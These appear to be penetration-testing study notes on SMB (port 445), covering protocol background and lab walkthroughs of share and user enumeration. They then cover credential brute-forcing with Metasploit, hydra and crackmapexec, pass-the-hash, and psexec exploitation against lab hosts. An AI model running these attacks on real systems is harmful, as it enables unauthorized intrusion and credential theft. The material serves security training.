# Port 445 - SMB `Server Message Block` (`SMB`) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. Information exchange between different system processes can also be handled based on the SMB protocol. [SMB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/f210069c-7086-4dc2-885e-861d837df688) first became available to a broader public, for example, as part of the OS/2 network operating system LAN Manager and LAN Server. Since then, the main application area of the protocol has been the Windows operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed. With the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB. ### Samba There is an alternative implementation of the SMB server called Samba, which is developed for Unix-based operating systems. Samba implements the Common Internet File System (`CIFS`) network protocol. [CIFS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/934c2faa-54af-4526-ac74-6a24d126724e) is a dialect of SMB, meaning it is a specific implementation of the SMB protocol originally created by Microsoft. This allows Samba to communicate effectively with newer Windows systems. Therefore, it is often referred to as SMB/CIFS. However, `CIFS` is considered a specific version of the SMB protocol, primarily aligning with `SMB version 1`. When SMB commands are transmitted over Samba to an older NetBIOS service, connections typically occur over TCP ports `137`, `138`, and `139`. In contrast, CIFS operates over TCP port `445` exclusively. There are several versions of SMB, including newer versions like `SMB 2` and `SMB 3`, which offer improvements and are preferred in modern infrastructures, while older versions like `SMB 1` (`CIFS`) are considered outdated but may still be used in specific environments. | **SMB Version** | **Supported** | **Features** | | --------------- | ----------------------------------- | ---------------------------------------------------------------------- | | CIFS | Windows NT 4.0 | Communication via NetBIOS interface | | SMB 1.0 | Windows 2000 | Direct connection via TCP | | SMB 2.0 | Windows Vista, Windows Server 2008 | Performance upgrades, improved message signing, caching feature | | SMB 2.1 | Windows 7, Windows Server 2008 R2 | Locking mechanisms | | SMB 3.0 | Windows 8, Windows Server 2012 | Multichannel connections, end-to-end encryption, remote storage access | | SMB 3.0.2 | Windows 8.1, Windows Server 2012 R2 | | | SMB 3.1.1 | Windows 10, Windows Server 2016 | Integrity checking, AES-128 encryption | With version 3, the Samba server gained the ability to be a full member of an Active Directory domain. With version 4, Samba even provides an Active Directory domain controller. It contains several so-called daemons for this purpose - which are Unix background programs. The SMB server daemon (`smbd`) belonging to Samba provides the first two functionalities, while the NetBIOS message block daemon (`nmbd`) implements the last two functionalities. The SMB service controls these two background programs. We know that Samba is suitable for both Linux and Windows systems. In a network, each host participates in the same `workgroup`. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an `application programming interface` (`API`) for networking computers called the `Network Basic Input/Output System` (`NetBIOS`). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called `name registration` procedure. Either each host reserves its hostname on the network, or the [NetBIOS Name Server](https://networkencyclopedia.com/netbios-name-server-nbns/) (`NBNS`) is used for this purpose. It also has been enhanced to [Windows Internet Name Service](https://networkencyclopedia.com/windows-internet-name-service-wins/) (`WINS`). **Restart Samba** ```shell-session root@samba:~# sudo systemctl restart smbd ``` We can display a list (`-L`) of the server's shares with the `smbclient` command from our host. We use the so-called `null session` (`-N`), which is `anonymous` access without the input of existing users or valid passwords. **SMBclient - Connecting to the Share** ```shell-session ammartiger@htb[/htb]$ smbclient -N -L //10.129.14.128 Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers home Disk INFREIGHT Samba dev Disk DEVenv notes Disk CheckIT IPC$ IPC IPC Service (DEVSM) SMB1 disabled -- no workgroup available ``` We can see that we now have five different shares on the Samba server from the result. Thereby `print$` and an `IPC$` are already included by default in the basic setting, as we have already seen. Since we deal with the `[notes]` share, let us log in and inspect it using the same client program. If we are not familiar with the client program, we can use the `help` command on successful login, listing all the possible commands we can execute. ```shell-session ammartiger@htb[/htb]$ smbclient //10.129.14.128/notes Enter WORKGROUP\'s password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> help ? allinfo altname archive backup blocksize cancel case_sensitive cd chmod chown close del deltree dir du echo exit get getfacl geteas hardlink help history iosize lcd link lock lowercase ls l mask md mget mkdir more mput newer notify open posix posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink posix_whoami print prompt put pwd q queue quit readlink rd recurse reget rename reput rm rmdir showacls setea setmode scopy stat symlink tar tarmode timeout translate unlock volume vuid wdel logon listconnect showconnect tcon tdis tid utimes logoff .. ! smb: \> ls . D 0 Wed Sep 22 18:17:51 2021 .. D 0 Wed Sep 22 12:03:59 2021 prep-prod.txt N 71 Sun Sep 19 15:45:21 2021 30313412 blocks of size 1024. 16480084 blocks available ``` Once we have discovered interesting files or folders, we can download them using the `get` command. Smbclient also allows us to execute local system commands using an exclamation mark at the beginning (`!`) without interrupting the connection. **Download Files from SMB** ```shell-session smb: \> get prep-prod.txt getting file \prep-prod.txt of size 71 as prep-prod.txt (8,7 KiloBytes/sec) (average 8,7 KiloBytes/sec) smb: \> !ls prep-prod.txt smb: \> !cat prep-prod.txt [] check your code with the templates [] run code-assessment.py [] … ``` From the administrative point of view, we can check these connections using `smbstatus`. Apart from the Samba version, we can also see who, from which host, and which share the client is connected. This is especially important once we have entered a subnet (perhaps even an isolated one) that the others can still access. For example, with domain-level security, the samba server acts as a member of a Windows domain. Each domain has at least one domain controller, usually a Windows NT server providing password authentication. This domain controller provides the workgroup with a definitive password server. The domain controllers keep track of users and passwords in their own `NTDS.dit` and `Security Authentication Module` (`SAM`) and authenticate each user when they log in for the first time and wish to access another machine's share. ### SMBCLIENT `smbclient -L (to list all shares)`
`smbclient //share (to access it)` {% hint style="info" %} cat command does not work. use more or less get command to download files {% endhint %} Using smbclient determine whether anonymous connection (null session) is allowed on the samba server or not. ``` ┌──(root㉿INE)-[~] └─# smbclient -L demo.ine.local -N Sharename Type Comment --------- ---- ------- public Disk john Disk aisha Disk emma Disk everyone Disk IPC$ IPC IPC Service (samba.recon.lab) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- RECONLABS SAMBA-RECON ``` Anonymous connection is allowed since shares are displayed without requirement of password. ### SMBMAP ``` smbmap -H [-P ] #Null user smbmap -u "username" -p "password" -H [-P ] #Creds smbmap -u "username" -p ":" -H [-P ] #Pass-the-Hash smbmap -R -u "username" -p "password" -H [-P ] #Recursive list ``` The tool has been updated and it was not working and I have to git clone it from the main GitHub page. ``` ┌──(kali㉿kali)-[~/Desktop/smbmap/smbmap] └─$ python3 ./smbmap.py -H 10.10.10.100 ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS ``` We can use smbmap to recursively list files as there are so many files. ``` ┌──(kali㉿kali)-[~/Desktop/smbmap/smbmap] └─$ python3 ./smbmap.py -H 10.10.10.100 -r --depth 10 ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY ./Replication dr--r--r-- 0 Sat Jul 21 06:37:44 2018 . dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .. dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb ``` We can use -A flag to filter out a file and download it. ``` ┌──(kali㉿kali)-[~/Desktop/smbmap/smbmap] └─$ python3 ./smbmap.py -H 10.10.10.100 -r --depth 10 -A Groups.xml ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [*] Performing file name pattern match! [+] Match found! Downloading: Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml [+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes) [+] File output to: /home/kali/Desktop/smbmap/smbmap/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml ``` ``` smbmap -H demo.ine.local -u admin -p password1 ```
### Netview net view command is used to find all resources shared by the target. ``` net view 10.0.28.125 ```
We can map the shared drive to the demo.ine.local machine using the' net' command. Let's map the shared resources, i.e., the Documents and K drive. ``` net use D: \\10.0.28.125\Documents net use K: \\10.0.28.125\K$ ```
We successfully mapped the resources to D and K drives. Let's check what is inside these mapped drives. ``` dir D: dir K: ```
Now that we can browse the shares content, we can download or read it on the attacker's machine. ### Enum4linux enumerate everything ``` enum4linux -a 192.168.18.110 ``` ### Nmap Enumeration ``` sudo nmap --script smb-os-discovery.nse 192.168.18.110 nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.184.162 nmap --script smb-enum-users.nse 192.168.88.25 ``` #### List the supported protocols and dialects of an SMB server ``` ┌──(root㉿INE)-[~] └─# nmap -p445 --script smb-protocols demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:41 IST Nmap scan report for demo.ine.local (10.5.22.188) Host is up (0.0021s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-protocols: | dialects: | NT LM 0.12 (SMBv1) [dangerous, but default] | 2:0:2 | 2:1:0 | 3:0:0 |_ 3:0:2 ``` #### SMB security level ``` ┌──(root㉿INE)-[~] └─# nmap -p445 --script smb-security-mode demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:43 IST Nmap scan report for demo.ine.local (10.5.22.188) Host is up (0.0023s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) Nmap done: 1 IP address (1 host up) scanned in 1.17 seconds ``` #### Logged in users ``` ┌──(root㉿INE)-[~] └─# nmap -p445 --script smb-enum-sessions demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:46 IST Nmap scan report for demo.ine.local (10.5.22.188) Host is up (0.0023s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-sessions: | Users logged in |_ WIN-OMCNBKR66MN\bob since Nmap done: 1 IP address (1 host up) scanned in 3.52 seconds ``` This is possible because the target machine is running with the guest login enable configuration and it is a misconfiguration. In case guest login is not enabled we can always use valid credentials of the target machine to discover the same information ``` nmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local ``` #### Enumerating shares ``` nmap -p445 --script smb-enum-shares demo.ine.local ``` Scanning all shares using valid credentials to check the permissions. ``` ┌──(root㉿INE)-[~] └─# nmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:51 IST Nmap scan report for demo.ine.local (10.5.22.188) Host is up (0.0025s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: administrator | \\10.5.22.188\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Users: 0 | Max Users: | Path: C:\Windows | Anonymous access: | Current user access: READ/WRITE | \\10.5.22.188\C: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: | Path: C:\ | Anonymous access: | Current user access: READ | \\10.5.22.188\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Users: 0 | Max Users: | Path: C:\ | Anonymous access: | Current user access: READ/WRITE ``` #### Enumerating Users ``` nmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local ``` #### Server statistics ``` ┌──(root㉿INE)-[~] └─# nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:54 IST Nmap scan report for demo.ine.local (10.5.22.188) Host is up (0.0021s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-server-stats: | Server statistics collected since 2025-11-04T15:06:31 (18m24s): | 59668 bytes (54.05 b/s) sent, 51959 bytes (47.06 b/s) received |_ 17 failed logins, 3 permission errors, 0 system errors, 0 print jobs, 26 files opened Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds ``` #### Enumerating available domains ``` nmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local ``` #### Enumerating available user groups ``` nmap -p445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local ``` #### Enumerating services ``` nmap -p445 --script smb-enum-services --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local ``` #### Enumerating all the shared folders and drives then running the ls command ``` nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local ``` ### SMB Version with Metasploit The nmap scan does not reveal the exact version of Samba running on the target, as a result, we will need to use a Metasploit module to identify this information. We will need to start the Metasploit Framework console (msfconsole) in order to use this module, this can be done by running the following command: ``` msfconsole ``` We can now load the module by running the following command: ``` use auxiliary/scanner/smb/smb_version ``` After loading the module, we will need to configure the module options, more specifically, we will need to set the target. ``` set RHOSTS demo.ine.local ``` We can now run the module by running the following command: ``` run ```
As shown in the above screenshot, the module identifies the version of Samba as **samba 3.0.20**. ### SMB bruteforcing with Metasploit ``` auxiliary/scanner/smb/smb_login ``` 
msfconsole -q
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS demo.ine.local
set VERBOSE false
exploit
### SMB bruteforcing with hydra ``` hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://target2.ine.local ``` ### SMB Bruteforcing with crackmapexec ``` crackmapexec smb target.ine.local -u tom -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ``` ### **Using the NTLM hash list to connect to a target** In the previous step, we discovered **leaked-hashes.txt**, which contains NTLM hashes.
Since the question asks us to compromise the **Nancy** user, we can use the **Metasploit** module `scanner/smb/smb_login` to attempt authentication using the leaked NTLM hash. First, type `options` to list the required options for the module.
Now, set the following options for the **Metasploit** module `scanner/smb/smb_login`: **RHOSTS**: Set the target IP address or hostname which is `target.ine.local` . **PASS\_FILE**: Set the path to the file containing the NTLM hashes which is `lekaded-hashes.txt`. **SMBUser**: Set the SMB username, which is `nancy`.
To create a session upon successful authentication, we need to set **CreateSession** to **true**. Once this is done, we can run the module to attempt compromising the SMB user **Nancy**.
We have successfully compromised the ‘nancy’ user. To view the active sessions, type the command `sessions`. To interact with the session, use the following command: `sessions 1`.
To list the shares available for the ‘nancy’ user, use the command: `shares`.
We don’t have access to the `HRDocuments` share. Let's connect to the `ITResources` share by using the command: `shares -i ITResources`. Then, use the `ls` command to list the contents of the directory.
To retrieve this flag, use the `download` command. And also download the **hint.txt** file. Press enter or click to view image in full size
Use the `cat` command to read its contents. This is where we find our second flag, which is:
### Checking shares permissions with crackmapexec ``` crackmapexec smb target2.ine.local -u administrator -p pineapple --shares ```
### Smbget -recursively download files from shares ``` smbget -R smb://10.10.184.162/anonymous ``` ### RPCClient One of the handy tools for this is `rpcclient`. This is a tool to perform MS-RPC functions. The [Remote Procedure Call](https://www.geeksforgeeks.org/remote-procedure-call-rpc-in-operating-system/) (`RPC`) is a concept and, therefore, also a central tool to realize operational and work-sharing structures in networks and client-server architectures. The communication process via RPC includes passing parameters and the return of a function value. **RPCclient** ```shell-session ammartiger@htb[/htb]$ rpcclient -U "" 10.129.14.128 Enter WORKGROUP\'s password: rpcclient $> ``` The `rpcclient` offers us many different requests with which we can execute specific functions on the SMB server to get information. A complete list of all these functions can be found on the [man page](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) of the rpcclient. | **Query** | **Description** | | ------------------------- | ------------------------------------------------------------------ | | `srvinfo` | Server information. | | `enumdomains` | Enumerate all domains that are deployed in the network. | | `querydominfo` | Provides domain, server, and user information of deployed domains. | | `netshareenumall` | Enumerates all available shares. | | `netsharegetinfo ` | Provides information about a specific share. | | `enumdomusers` | Enumerates all domain users. | | `queryuser ` | Provides information about a specific user. | **RPCclient - Enumeration** ```shell-session rpcclient $> srvinfo DEVSMB Wk Sv PrQ Unx NT SNT DEVSM platform_id : 500 os version : 6.1 server type : 0x809a03 rpcclient $> enumdomains name:[DEVSMB] idx:[0x0] name:[Builtin] idx:[0x1] rpcclient $> querydominfo Domain: DEVOPS Server: DEVSMB Comment: DEVSM Total Users: 2 Total Groups: 0 Total Aliases: 0 Sequence No: 1632361158 Force Logoff: -1 Domain Server State: 0x1 Server Role: ROLE_DOMAIN_PDC Unknown 3: 0x1 rpcclient $> netshareenumall netname: print$ remark: Printer Drivers path: C:\var\lib\samba\printers password: netname: home remark: INFREIGHT Samba path: C:\home\ password: netname: dev remark: DEVenv path: C:\home\sambauser\dev\ password: netname: notes remark: CheckIT path: C:\mnt\notes\ password: netname: IPC$ remark: IPC Service (DEVSM) path: C:\tmp password: rpcclient $> netsharegetinfo notes netname: notes remark: CheckIT path: C:\mnt\notes\ password: type: 0x0 perms: 0 max_uses: -1 num_uses: 1 revision: 1 type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE DACL ACL Num ACEs: 1 revision: 2 --- ACE type: ACCESS ALLOWED (0) flags: 0x00 Specific bits: 0x1ff Permissions: 0x101f01ff: Generic all access SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS SID: S-1-1-0 ``` These examples show us what information can be leaked to anonymous users. Once an `anonymous` user has access to a network service, it only takes one mistake to give them too many permissions or too much visibility to put the entire network at significant risk. Most importantly, anonymous access to such services can also lead to the discovery of other users, who can be attacked with brute-forcing in the most aggressive case. Humans are more error-prone than properly configured computer processes, and the lack of security awareness and laziness often leads to weak passwords that can be easily cracked. Let us see how we can enumerate users using the `rpcclient`. **Rpcclient - User Enumeration** ```shell-session rpcclient $> enumdomusers user:[mrb3n] rid:[0x3e8] user:[cry0l1t3] rid:[0x3e9] rpcclient $> queryuser 0x3e9 User Name : cry0l1t3 Full Name : cry0l1t3 Home Drive : \\devsmb\cry0l1t3 Dir Drive : Profile Path: \\devsmb\cry0l1t3\profile Logon Script: Description : Workstations: Comment : Remote Dial : Logon Time : Do, 01 Jan 1970 01:00:00 CET Logoff Time : Mi, 06 Feb 2036 16:06:39 CET Kickoff Time : Mi, 06 Feb 2036 16:06:39 CET Password last set Time : Mi, 22 Sep 2021 17:50:56 CEST Password can change Time : Mi, 22 Sep 2021 17:50:56 CEST Password must change Time: Do, 14 Sep 30828 04:48:05 CEST unknown_2[0..31]... user_rid : 0x3e9 group_rid: 0x201 acb_info : 0x00000014 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000000 logon_count: 0x00000000 padding1[0..7]... logon_hrs[0..21]... rpcclient $> queryuser 0x3e8 User Name : mrb3n Full Name : Home Drive : \\devsmb\mrb3n Dir Drive : Profile Path: \\devsmb\mrb3n\profile Logon Script: Description : Workstations: Comment : Remote Dial : Logon Time : Do, 01 Jan 1970 01:00:00 CET Logoff Time : Mi, 06 Feb 2036 16:06:39 CET Kickoff Time : Mi, 06 Feb 2036 16:06:39 CET Password last set Time : Mi, 22 Sep 2021 17:47:59 CEST Password can change Time : Mi, 22 Sep 2021 17:47:59 CEST Password must change Time: Do, 14 Sep 30828 04:48:05 CEST unknown_2[0..31]... user_rid : 0x3e8 group_rid: 0x201 acb_info : 0x00000010 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000000 logon_count: 0x00000000 padding1[0..7]... logon_hrs[0..21]... ``` We can then use the results to identify the group's RID, which we can then use to retrieve information from the entire group. **Rpcclient - Group Information** ```shell-session rpcclient $> querygroup 0x201 Group Name: None Description: Ordinary Users Group Attribute:7 Num Members:2 ``` However, it can also happen that not all commands are available to us, and we have certain restrictions based on the user. However, the query `queryuser ` is mostly allowed based on the RID. So we can use the rpcclient to brute force the RIDs to get information. Because we may not know who has been assigned which RID, we know that we will get information about it as soon as we query an assigned RID. There are several ways and tools we can use for this. To stay with the tool, we can create a `For-loop` using `Bash` where we send a command to the service using rpcclient and filter out the results. **Brute Forcing User RIDs** ```shell-session ammartiger@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done User Name : sambauser user_rid : 0x1f5 group_rid: 0x201 User Name : mrb3n user_rid : 0x3e8 group_rid: 0x201 User Name : cry0l1t3 user_rid : 0x3e9 group_rid: 0x201 ``` An alternative to this would be a Python script from [Impacket](https://github.com/SecureAuthCorp/impacket) called [samrdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py). **Impacket - Samrdump.py** ```shell-session ammartiger@htb[/htb]$ samrdump.py 10.129.14.128 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Retrieving endpoint list from 10.129.14.128 Found domain(s): . DEVSMB . Builtin [*] Looking up users in domain DEVSMB Found user: mrb3n, uid = 1000 Found user: cry0l1t3, uid = 1001 mrb3n (1000)/FullName: mrb3n (1000)/UserComment: mrb3n (1000)/PrimaryGroupId: 513 mrb3n (1000)/BadPasswordCount: 0 mrb3n (1000)/LogonCount: 0 mrb3n (1000)/PasswordLastSet: 2021-09-22 17:47:59 mrb3n (1000)/PasswordDoesNotExpire: False mrb3n (1000)/AccountIsDisabled: False mrb3n (1000)/ScriptPath: cry0l1t3 (1001)/FullName: cry0l1t3 cry0l1t3 (1001)/UserComment: cry0l1t3 (1001)/PrimaryGroupId: 513 cry0l1t3 (1001)/BadPasswordCount: 0 cry0l1t3 (1001)/LogonCount: 0 cry0l1t3 (1001)/PasswordLastSet: 2021-09-22 17:50:56 cry0l1t3 (1001)/PasswordDoesNotExpire: False cry0l1t3 (1001)/AccountIsDisabled: False cry0l1t3 (1001)/ScriptPath: [*] Received 2 entries. ``` The information we have already obtained with `rpcclient` can also be obtained using other tools. For example, the [SMBMap](https://github.com/ShawnDEvans/smbmap) and [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) tools are also widely used and helpful for the enumeration of SMB services. ### Metasploit Database If multiple targets then required ``` systemctl start postgresql msfdb init ``` Then start msfconsole and check status ``` db_status ``` ### SMB Exploitation with Metasploit with known credentials ### Reference {% embed url="" %} ``` use exploit/windows/smb/psexec set RHOSTS 10.10.218.141 set SMBUser ballen set SMBPass Password1 run ```
### Post exploitation Modules ``` post/windows/gather/enum_domain post/windows/gather/enum_shares ``` **CrackMapExec** ```shell-session ammartiger@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p '' SMB 10.129.14.128 445 DEVSMB [*] Windows 6.1 Build 0 (name:DEVSMB) (domain:) (signing:False) (SMBv1:False) SMB 10.129.14.128 445 DEVSMB [+] \: SMB 10.129.14.128 445 DEVSMB [+] Enumerated shares SMB 10.129.14.128 445 DEVSMB Share Permissions Remark SMB 10.129.14.128 445 DEVSMB ----- ----------- ------ SMB 10.129.14.128 445 DEVSMB print$ Printer Drivers SMB 10.129.14.128 445 DEVSMB home INFREIGHT Samba SMB 10.129.14.128 445 DEVSMB dev DEVenv SMB 10.129.14.128 445 DEVSMB notes READ,WRITE CheckIT SMB 10.129.14.128 445 DEVSMB IPC$ IPC Service (DEVSM) ``` Another tool worth mentioning is the so-called [enum4linux-ng](https://github.com/cddmp/enum4linux-ng), which is based on an older tool, enum4linux. This tool automates many of the queries, but not all, and can return a large amount of information. **Enum4Linux-ng - Installation** ```shell-session ammartiger@htb[/htb]$ git clone https://github.com/cddmp/enum4linux-ng.git ammartiger@htb[/htb]$ cd enum4linux-ng ammartiger@htb[/htb]$ pip3 install -r requirements.txt ``` **Enum4Linux-ng - Enumeration** ```shell-session ammartiger@htb[/htb]$ ./enum4linux-ng.py 10.129.14.128 -A ENUM4LINUX - next generation ========================== | Target Information | ========================== [*] Target ........... 10.129.14.128 [*] Username ......... '' [*] Random Username .. 'juzgtcsu' [*] Password ......... '' [*] Timeout .......... 5 second(s) ===================================== | Service Scan on 10.129.14.128 | ===================================== [*] Checking LDAP [-] Could not connect to LDAP on 389/tcp: connection refused [*] Checking LDAPS [-] Could not connect to LDAPS on 636/tcp: connection refused [*] Checking SMB [+] SMB is accessible on 445/tcp [*] Checking SMB over NetBIOS [+] SMB over NetBIOS is accessible on 139/tcp ===================================================== | NetBIOS Names and Workgroup for 10.129.14.128 | ===================================================== [+] Got domain/workgroup name: DEVOPS [+] Full NetBIOS names information: - DEVSMB <00> - H Workstation Service - DEVSMB <03> - H Messenger Service - DEVSMB <20> - H File Server Service - ..__MSBROWSE__. <01> - H Master Browser - DEVOPS <00> - H Domain/Workgroup Name - DEVOPS <1d> - H Master Browser - DEVOPS <1e> - H Browser Service Elections - MAC Address = 00-00-00-00-00-00 ========================================== | SMB Dialect Check on 10.129.14.128 | ========================================== [*] Trying on 445/tcp [+] Supported dialects and settings: SMB 1.0: false SMB 2.02: true SMB 2.1: true SMB 3.0: true SMB1 only: false Preferred dialect: SMB 3.0 SMB signing required: false ========================================== | RPC Session Check on 10.129.14.128 | ========================================== [*] Check for null session [+] Server allows session using username '', password '' [*] Check for random user session [+] Server allows session using username 'juzgtcsu', password '' [H] Rerunning enumeration with user 'juzgtcsu' might give more results ==================================================== | Domain Information via RPC for 10.129.14.128 | ==================================================== [+] Domain: DEVOPS [+] SID: NULL SID [+] Host is part of a workgroup (not a domain) ============================================================ | Domain Information via SMB session for 10.129.14.128 | ============================================================ [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found domain information via SMB NetBIOS computer name: DEVSMB NetBIOS domain name: '' DNS domain: '' FQDN: htb ================================================ | OS Information via RPC for 10.129.14.128 | ================================================ [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found OS information via SMB [*] Enumerating via 'srvinfo' [+] Found OS information via 'srvinfo' [+] After merging OS information we have the following result: OS: Windows 7, Windows Server 2008 R2 OS version: '6.1' OS release: '' OS build: '0' Native OS: not supported Native LAN manager: not supported Platform id: '500' Server type: '0x809a03' Server type string: Wk Sv PrQ Unx NT SNT DEVSM ====================================== | Users via RPC on 10.129.14.128 | ====================================== [*] Enumerating users via 'querydispinfo' [+] Found 2 users via 'querydispinfo' [*] Enumerating users via 'enumdomusers' [+] Found 2 users via 'enumdomusers' [+] After merging user results we have 2 users total: '1000': username: mrb3n name: '' acb: '0x00000010' description: '' '1001': username: cry0l1t3 name: cry0l1t3 acb: '0x00000014' description: '' ======================================= | Groups via RPC on 10.129.14.128 | ======================================= [*] Enumerating local groups [+] Found 0 group(s) via 'enumalsgroups domain' [*] Enumerating builtin groups [+] Found 0 group(s) via 'enumalsgroups builtin' [*] Enumerating domain groups [+] Found 0 group(s) via 'enumdomgroups' ======================================= | Shares via RPC on 10.129.14.128 | ======================================= [*] Enumerating shares [+] Found 5 share(s): IPC$: comment: IPC Service (DEVSM) type: IPC dev: comment: DEVenv type: Disk home: comment: INFREIGHT Samba type: Disk notes: comment: CheckIT type: Disk print$: comment: Printer Drivers type: Disk [*] Testing share IPC$ [-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND [*] Testing share dev [-] Share doesn't exist [*] Testing share home [+] Mapping: OK, Listing: OK [*] Testing share notes [+] Mapping: OK, Listing: OK [*] Testing share print$ [+] Mapping: DENIED, Listing: N/A ========================================== | Policies via 